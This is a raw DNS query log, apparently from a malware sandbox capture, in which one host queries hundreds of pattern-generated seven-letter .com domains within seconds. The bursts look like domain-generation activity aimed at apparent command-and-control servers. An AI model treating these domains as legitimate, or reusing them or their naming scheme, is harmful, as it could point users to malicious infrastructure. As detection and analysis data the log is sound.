Aug 23, 2024 18:43:27.973125935 CEST	192.168.2.5	1.1.1.1	0x30	Standard query (0)	lysyjid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.973403931 CEST	192.168.2.5	1.1.1.1	0x2888	Standard query (0)	vonybat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.974486113 CEST	192.168.2.5	1.1.1.1	0x283c	Standard query (0)	qekytyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.974877119 CEST	192.168.2.5	1.1.1.1	0x52e9	Standard query (0)	pupyjuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.975244999 CEST	192.168.2.5	1.1.1.1	0x3730	Standard query (0)	ganyvoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.975521088 CEST	192.168.2.5	1.1.1.1	0x27ea	Standard query (0)	lykytej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.975946903 CEST	192.168.2.5	1.1.1.1	0xca4	Standard query (0)	vopyjuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.976325035 CEST	192.168.2.5	1.1.1.1	0x9e4d	Standard query (0)	qebyvop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.976639986 CEST	192.168.2.5	1.1.1.1	0x68b8	Standard query (0)	pujyteq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.976942062 CEST	192.168.2.5	1.1.1.1	0xaece	Standard query (0)	lyvyvix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.978209972 CEST	192.168.2.5	1.1.1.1	0xc3f8	Standard query (0)	gatyhub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.978627920 CEST	192.168.2.5	1.1.1.1	0x15b7	Standard query (0)	vojyrak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.979192972 CEST	192.168.2.5	1.1.1.1	0x80cd	Standard query (0)	qetyhyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.979576111 CEST	192.168.2.5	1.1.1.1	0x4d79	Standard query (0)	puvycip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.043961048 CEST	192.168.2.5	1.1.1.1	0x52a7	Standard query (0)	qetyhyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:28.291472912 CEST	192.168.2.5	1.1.1.1	0x20bb	Standard query (0)	gatyhub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.706053019 CEST	192.168.2.5	1.1.1.1	0xf99c	Standard query (0)	gahyraw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.706629992 CEST	192.168.2.5	1.1.1.1	0x307e	Standard query (0)	lyrygyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.707161903 CEST	192.168.2.5	1.1.1.1	0x1250	Standard query (0)	vocycuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.707683086 CEST	192.168.2.5	1.1.1.1	0x508e	Standard query (0)	qegyrol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.708098888 CEST	192.168.2.5	1.1.1.1	0x77aa	Standard query (0)	purygeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.708347082 CEST	192.168.2.5	1.1.1.1	0x48ca	Standard query (0)	lygywor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.708395958 CEST	192.168.2.5	1.1.1.1	0x7e58	Standard query (0)	vowygem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.708817959 CEST	192.168.2.5	1.1.1.1	0x623f	Standard query (0)	gacycus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.709062099 CEST	192.168.2.5	1.1.1.1	0xda6	Standard query (0)	qexyxuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.709076881 CEST	192.168.2.5	1.1.1.1	0x9c7e	Standard query (0)	pufywil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.709750891 CEST	192.168.2.5	1.1.1.1	0xcbc9	Standard query (0)	gaqyfah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.709917068 CEST	192.168.2.5	1.1.1.1	0x4670	Standard query (0)	qeqyfaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.709990978 CEST	192.168.2.5	1.1.1.1	0x6da7	Standard query (0)	puzyxyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.710479975 CEST	192.168.2.5	1.1.1.1	0x6a9c	Standard query (0)	lymyfoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.710949898 CEST	192.168.2.5	1.1.1.1	0x16e4	Standard query (0)	gadyquz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.710949898 CEST	192.168.2.5	1.1.1.1	0x3ab	Standard query (0)	volyzef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.710949898 CEST	192.168.2.5	1.1.1.1	0x70ac	Standard query (0)	qedyqup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.711368084 CEST	192.168.2.5	1.1.1.1	0xb06b	Standard query (0)	pumydoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.711617947 CEST	192.168.2.5	1.1.1.1	0xc2d3	Standard query (0)	lysymux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.711648941 CEST	192.168.2.5	1.1.1.1	0xdab4	Standard query (0)	galyzeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.712127924 CEST	192.168.2.5	1.1.1.1	0xb49c	Standard query (0)	qekylag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.712140083 CEST	192.168.2.5	1.1.1.1	0x93c7	Standard query (0)	vonydik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.712549925 CEST	192.168.2.5	1.1.1.1	0xda18	Standard query (0)	pupymyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.712563992 CEST	192.168.2.5	1.1.1.1	0x5f54	Standard query (0)	ganydiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.713049889 CEST	192.168.2.5	1.1.1.1	0x2690	Standard query (0)	lykylan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.713234901 CEST	192.168.2.5	1.1.1.1	0xa550	Standard query (0)	vopymyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.713293076 CEST	192.168.2.5	1.1.1.1	0x3196	Standard query (0)	qebysul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.713808060 CEST	192.168.2.5	1.1.1.1	0xf720	Standard query (0)	pujylog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.714258909 CEST	192.168.2.5	1.1.1.1	0xc46b	Standard query (0)	gatynes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.714258909 CEST	192.168.2.5	1.1.1.1	0x2e22	Standard query (0)	lyvysur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.714273930 CEST	192.168.2.5	1.1.1.1	0xee8e	Standard query (0)	vojykom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.714709997 CEST	192.168.2.5	1.1.1.1	0x161e	Standard query (0)	qetynev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.714958906 CEST	192.168.2.5	1.1.1.1	0x24a3	Standard query (0)	gahykih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.714993000 CEST	192.168.2.5	1.1.1.1	0xfaa1	Standard query (0)	puvypul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.715440035 CEST	192.168.2.5	1.1.1.1	0xf97c	Standard query (0)	lyrynad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.715668917 CEST	192.168.2.5	1.1.1.1	0x2a3a	Standard query (0)	vocypyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.715708971 CEST	192.168.2.5	1.1.1.1	0x4c50	Standard query (0)	qegykiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.716224909 CEST	192.168.2.5	1.1.1.1	0xf9c6	Standard query (0)	purybav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.716476917 CEST	192.168.2.5	1.1.1.1	0x3e84	Standard query (0)	gacypyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.716536045 CEST	192.168.2.5	1.1.1.1	0xb215	Standard query (0)	lygyjuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.717016935 CEST	192.168.2.5	1.1.1.1	0x70c2	Standard query (0)	vowybof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.717245102 CEST	192.168.2.5	1.1.1.1	0x7a41	Standard query (0)	qexytep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.717349052 CEST	192.168.2.5	1.1.1.1	0x6c25	Standard query (0)	pufyjuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.717961073 CEST	192.168.2.5	1.1.1.1	0x6ac5	Standard query (0)	gaqyvob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.718139887 CEST	192.168.2.5	1.1.1.1	0x86b8	Standard query (0)	lyxytex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.719747066 CEST	192.168.2.5	1.1.1.1	0x4976	Standard query (0)	vofyjuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.720196962 CEST	192.168.2.5	1.1.1.1	0xdeb5	Standard query (0)	vofyqit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.720196962 CEST	192.168.2.5	1.1.1.1	0xecc1	Standard query (0)	lyxyxyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.720573902 CEST	192.168.2.5	1.1.1.1	0x96ce	Standard query (0)	qeqyvig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.720597982 CEST	192.168.2.5	1.1.1.1	0x82a0	Standard query (0)	puzytap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.720768929 CEST	192.168.2.5	1.1.1.1	0x2947	Standard query (0)	gadyhyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.720825911 CEST	192.168.2.5	1.1.1.1	0x291	Standard query (0)	lymyvin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.720923901 CEST	192.168.2.5	1.1.1.1	0x5a35	Standard query (0)	volyrac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721064091 CEST	192.168.2.5	1.1.1.1	0x4645	Standard query (0)	qedyhyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721180916 CEST	192.168.2.5	1.1.1.1	0xacdd	Standard query (0)	pumycug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721328020 CEST	192.168.2.5	1.1.1.1	0x7ca7	Standard query (0)	galyros.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721498013 CEST	192.168.2.5	1.1.1.1	0xbaf3	Standard query (0)	vonycum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721509933 CEST	192.168.2.5	1.1.1.1	0xa3b4	Standard query (0)	lysyger.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721663952 CEST	192.168.2.5	1.1.1.1	0xfb00	Standard query (0)	qekyrov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721703053 CEST	192.168.2.5	1.1.1.1	0xc970	Standard query (0)	ganycuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721834898 CEST	192.168.2.5	1.1.1.1	0x6468	Standard query (0)	vopygat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.721884966 CEST	192.168.2.5	1.1.1.1	0xe6c5	Standard query (0)	qebyxyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.722002983 CEST	192.168.2.5	1.1.1.1	0x8265	Standard query (0)	pupygel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.722162962 CEST	192.168.2.5	1.1.1.1	0x5aab	Standard query (0)	lykywid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.893743992 CEST	192.168.2.5	1.1.1.1	0xfd9f	Standard query (0)	pujywiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.894606113 CEST	192.168.2.5	1.1.1.1	0x235e	Standard query (0)	gatyfaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.895234108 CEST	192.168.2.5	1.1.1.1	0x9707	Standard query (0)	lyvyxyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.895811081 CEST	192.168.2.5	1.1.1.1	0x5fd9	Standard query (0)	vojyquf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.896352053 CEST	192.168.2.5	1.1.1.1	0xfb91	Standard query (0)	qetyfop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.896787882 CEST	192.168.2.5	1.1.1.1	0x7629	Standard query (0)	gahyqub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.897115946 CEST	192.168.2.5	1.1.1.1	0xf7e8	Standard query (0)	lyryfox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.897533894 CEST	192.168.2.5	1.1.1.1	0xb714	Standard query (0)	vocyzek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.897614002 CEST	192.168.2.5	1.1.1.1	0x42b2	Standard query (0)	qegyqug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.898158073 CEST	192.168.2.5	1.1.1.1	0x5b8a	Standard query (0)	purydip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.898308039 CEST	192.168.2.5	1.1.1.1	0x83e2	Standard query (0)	gacyzaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.898574114 CEST	192.168.2.5	1.1.1.1	0xb27d	Standard query (0)	lygymyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.898940086 CEST	192.168.2.5	1.1.1.1	0x77d9	Standard query (0)	vowydic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.899418116 CEST	192.168.2.5	1.1.1.1	0x5a74	Standard query (0)	qexylal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.899431944 CEST	192.168.2.5	1.1.1.1	0x3729	Standard query (0)	pufymyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.899923086 CEST	192.168.2.5	1.1.1.1	0x381f	Standard query (0)	gaqydus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.900331974 CEST	192.168.2.5	1.1.1.1	0x258f	Standard query (0)	lyxylor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.900646925 CEST	192.168.2.5	1.1.1.1	0xe06f	Standard query (0)	vofymem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.900794983 CEST	192.168.2.5	1.1.1.1	0x1cb9	Standard query (0)	qeqysuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.901784897 CEST	192.168.2.5	1.1.1.1	0xd3c2	Standard query (0)	puzylol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.901969910 CEST	192.168.2.5	1.1.1.1	0x2583	Standard query (0)	gadyneh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.903795958 CEST	192.168.2.5	1.1.1.1	0x2d07	Standard query (0)	lymysud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.905721903 CEST	192.168.2.5	1.1.1.1	0x389a	Standard query (0)	puvyxeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.905852079 CEST	192.168.2.5	1.1.1.1	0x8c8a	Standard query (0)	volykit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.905951023 CEST	192.168.2.5	1.1.1.1	0x283e	Standard query (0)	qedynaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.906124115 CEST	192.168.2.5	1.1.1.1	0x8e3a	Standard query (0)	galykiz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.906183004 CEST	192.168.2.5	1.1.1.1	0x2d2b	Standard query (0)	pumypyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.906335115 CEST	192.168.2.5	1.1.1.1	0xed80	Standard query (0)	lysynaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.906487942 CEST	192.168.2.5	1.1.1.1	0x2c87	Standard query (0)	vonypyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.906680107 CEST	192.168.2.5	1.1.1.1	0x5283	Standard query (0)	qekykup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.906754017 CEST	192.168.2.5	1.1.1.1	0x1a6f	Standard query (0)	lykyjux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.906909943 CEST	192.168.2.5	1.1.1.1	0xb9d5	Standard query (0)	qebyteg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907007933 CEST	192.168.2.5	1.1.1.1	0x819c	Standard query (0)	pupyboq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907073975 CEST	192.168.2.5	1.1.1.1	0xa676	Standard query (0)	vopybok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907208920 CEST	192.168.2.5	1.1.1.1	0x2945	Standard query (0)	pujyjup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907291889 CEST	192.168.2.5	1.1.1.1	0x3dc2	Standard query (0)	lyvytan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907428980 CEST	192.168.2.5	1.1.1.1	0xd172	Standard query (0)	vojyjyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907599926 CEST	192.168.2.5	1.1.1.1	0x32be	Standard query (0)	qetyvil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907834053 CEST	192.168.2.5	1.1.1.1	0xeade	Standard query (0)	puvytag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.907954931 CEST	192.168.2.5	1.1.1.1	0x769d	Standard query (0)	gatyviw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.908144951 CEST	192.168.2.5	1.1.1.1	0x4be4	Standard query (0)	lyryvur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.908623934 CEST	192.168.2.5	1.1.1.1	0xf226	Standard query (0)	gahyhys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.908773899 CEST	192.168.2.5	1.1.1.1	0x7837	Standard query (0)	vocyrom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.908992052 CEST	192.168.2.5	1.1.1.1	0x3157	Standard query (0)	ganypeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.909048080 CEST	192.168.2.5	1.1.1.1	0x79a8	Standard query (0)	qegyhev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.909481049 CEST	192.168.2.5	1.1.1.1	0xc118	Standard query (0)	lygyged.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.909677982 CEST	192.168.2.5	1.1.1.1	0xa17e	Standard query (0)	purycul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.909703016 CEST	192.168.2.5	1.1.1.1	0x1845	Standard query (0)	gacyroh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.909871101 CEST	192.168.2.5	1.1.1.1	0x1645	Standard query (0)	vowycut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910010099 CEST	192.168.2.5	1.1.1.1	0x79d4	Standard query (0)	qexyriq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910096884 CEST	192.168.2.5	1.1.1.1	0x5e11	Standard query (0)	lyxywij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910157919 CEST	192.168.2.5	1.1.1.1	0x9726	Standard query (0)	pufygav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910357952 CEST	192.168.2.5	1.1.1.1	0xe00a	Standard query (0)	vofygaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910459042 CEST	192.168.2.5	1.1.1.1	0x98e4	Standard query (0)	qeqyxyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910624027 CEST	192.168.2.5	1.1.1.1	0x440b	Standard query (0)	puzywuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910624027 CEST	192.168.2.5	1.1.1.1	0x77ce	Standard query (0)	gaqycyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.910845041 CEST	192.168.2.5	1.1.1.1	0x3178	Standard query (0)	gadyfob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.911016941 CEST	192.168.2.5	1.1.1.1	0x96fd	Standard query (0)	lymyxex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.911154985 CEST	192.168.2.5	1.1.1.1	0x4a41	Standard query (0)	qedyfog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.911222935 CEST	192.168.2.5	1.1.1.1	0x2db1	Standard query (0)	volyquk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.911611080 CEST	192.168.2.5	1.1.1.1	0x86b1	Standard query (0)	pumyxep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.911680937 CEST	192.168.2.5	1.1.1.1	0xdb9f	Standard query (0)	galyquw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.911822081 CEST	192.168.2.5	1.1.1.1	0xc8fc	Standard query (0)	vonyzac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.912082911 CEST	192.168.2.5	1.1.1.1	0xa9ca	Standard query (0)	lysyfin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.948759079 CEST	192.168.2.5	1.1.1.1	0x2397	Standard query (0)	qekyqyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.949552059 CEST	192.168.2.5	1.1.1.1	0x2760	Standard query (0)	pupydig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.950284004 CEST	192.168.2.5	1.1.1.1	0x302	Standard query (0)	ganyzas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.950951099 CEST	192.168.2.5	1.1.1.1	0x848d	Standard query (0)	lykymyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.951246023 CEST	192.168.2.5	1.1.1.1	0x16f	Standard query (0)	vopydum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.951725960 CEST	192.168.2.5	1.1.1.1	0x5e42	Standard query (0)	pujymel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.951742887 CEST	192.168.2.5	1.1.1.1	0xec4f	Standard query (0)	qebylov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.952236891 CEST	192.168.2.5	1.1.1.1	0x4def	Standard query (0)	gatyduh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.952253103 CEST	192.168.2.5	1.1.1.1	0x31b	Standard query (0)	lyvylod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.952692986 CEST	192.168.2.5	1.1.1.1	0xa628	Standard query (0)	vojymet.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.952907085 CEST	192.168.2.5	1.1.1.1	0xc5c1	Standard query (0)	qetysuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.953181982 CEST	192.168.2.5	1.1.1.1	0x6f7e	Standard query (0)	puvyliv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.953536987 CEST	192.168.2.5	1.1.1.1	0x9287	Standard query (0)	gahynaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.954041958 CEST	192.168.2.5	1.1.1.1	0x7052	Standard query (0)	lyrysyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.954595089 CEST	192.168.2.5	1.1.1.1	0xd4b7	Standard query (0)	qegynap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.954890013 CEST	192.168.2.5	1.1.1.1	0x44ff	Standard query (0)	vocykif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.955202103 CEST	192.168.2.5	1.1.1.1	0xa61b	Standard query (0)	purypyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.955966949 CEST	192.168.2.5	1.1.1.1	0x6465	Standard query (0)	gacykub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.956517935 CEST	192.168.2.5	1.1.1.1	0xba3f	Standard query (0)	lygynox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.957117081 CEST	192.168.2.5	1.1.1.1	0x55bb	Standard query (0)	vowypek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.957618952 CEST	192.168.2.5	1.1.1.1	0xa73f	Standard query (0)	qexykug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.958111048 CEST	192.168.2.5	1.1.1.1	0x2199	Standard query (0)	pufybop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.959171057 CEST	192.168.2.5	1.1.1.1	0x8b8d	Standard query (0)	gaqypew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.960055113 CEST	192.168.2.5	1.1.1.1	0xf241	Standard query (0)	lyxyjun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.960274935 CEST	192.168.2.5	1.1.1.1	0xa3e6	Standard query (0)	vofybic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.960895061 CEST	192.168.2.5	1.1.1.1	0xcc9c	Standard query (0)	qeqytal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.961066008 CEST	192.168.2.5	1.1.1.1	0x4f0f	Standard query (0)	puzyjyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.961828947 CEST	192.168.2.5	1.1.1.1	0x75d7	Standard query (0)	lymytar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.961973906 CEST	192.168.2.5	1.1.1.1	0xe1a0	Standard query (0)	volyjym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.964109898 CEST	192.168.2.5	1.1.1.1	0x1e4a	Standard query (0)	qedyvuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.967808008 CEST	192.168.2.5	1.1.1.1	0x4dc3	Standard query (0)	gadyvis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.968122959 CEST	192.168.2.5	1.1.1.1	0x67d9	Standard query (0)	galyheh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.968334913 CEST	192.168.2.5	1.1.1.1	0x4c32	Standard query (0)	vonyrot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.968365908 CEST	192.168.2.5	1.1.1.1	0xa302	Standard query (0)	qekyheq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.968990088 CEST	192.168.2.5	1.1.1.1	0x22c4	Standard query (0)	pupycuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.969116926 CEST	192.168.2.5	1.1.1.1	0x5193	Standard query (0)	lykygaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.969376087 CEST	192.168.2.5	1.1.1.1	0xde02	Standard query (0)	ganyriz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.969449997 CEST	192.168.2.5	1.1.1.1	0x9f25	Standard query (0)	vopycyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.969822884 CEST	192.168.2.5	1.1.1.1	0x5c02	Standard query (0)	qebyrip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.970072985 CEST	192.168.2.5	1.1.1.1	0x571f	Standard query (0)	pujygaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.970128059 CEST	192.168.2.5	1.1.1.1	0x9680	Standard query (0)	gatycyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.970261097 CEST	192.168.2.5	1.1.1.1	0xc89c	Standard query (0)	lyvywux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.970480919 CEST	192.168.2.5	1.1.1.1	0xcf2a	Standard query (0)	vojygok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:29.970773935 CEST	192.168.2.5	1.1.1.1	0xfd0f	Standard query (0)	qetyxeg.com	A (IP address)	IN (0x0001)	false
